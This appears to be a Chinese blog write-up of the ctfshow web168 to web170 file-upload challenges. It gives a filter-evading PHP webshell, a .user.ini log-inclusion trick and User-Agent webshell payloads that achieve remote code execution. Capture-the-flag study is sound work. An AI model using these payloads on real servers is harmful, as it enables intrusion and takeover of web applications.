web168(基础免杀)

本文探讨了PHP环境中的一种基础免杀技术,通过字符串重组规避系统函数过滤实现命令执行。同时,介绍了利用.user.ini文件进行日志包含攻击的方法,以及如何通过修改请求头绕过文件类型检测实现远程代码执行。在web170中,虽然增加了文件头检查,但利用技巧仍然有效。
摘要由CSDN通过智能技术生成

web168(基础免杀)

通过测试只可以上传png图片,
但是上传后没有任何回显,
并且对eval,system还有$_POST$_GET进行过滤,
$_REQUEST还可以用
PHP $_REQUEST 用于收集HTML表单提交的数据。
$_REQUEST 提交两次数据,一次为参数,一次为函数system
php免杀绕过
miansha.php

<?php
$a = "s#y#s#t#e#m";
$b = explode("#",$a);
$c = $b[0].$b[1].$b[2].$b[3].$b[4].$b[5];
$c($_REQUEST[1]);
?>

explode() 函数使用一个字符串分割另一个字符串,并返回由字符串组成的数组。
$c = $b[0].$b[1].$b[2].$b[3].$b[4].$b[5];组合为system
上传miansha.png抓包修改后缀为php
在这里插入图片描述访问/upload/miansha.php,直接rce拿到flag

web169

简单测试发现过滤一堆函数,和关键字
在这里插入图片描述但是配置文件任可以抓包上传

在这里插入图片描述尝试日志包含

GIF89a
auto_prepend_file=/var/log/nginx/access.log

在这里插入图片描述修改UA,

User-Agent: <?=`tac ../f*` ?>
User-Agent: <?=`ls ../` ?>
User-Agent: <?=`echo '11111111'` ?>
User-Agent: <?php system('tac ../f*');?>
User-Agent: <?php @eval($_POST['xiaoyu']); ?>

随后抓包上传一个无内容的php文件,访问php
在这里插入图片描述都是老样子,没能执行成功,
在这里插入图片描述发现日志包含的地方错了
一句话要包含在php文件的UA头
访问,rce拿到flag
在这里插入图片描述

web170(.user.ini包含)

上一题的一样,有点区别就是做了个文件头检查
不过我习惯检不检查都加,所以一样的思路
在这里插入图片描述
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值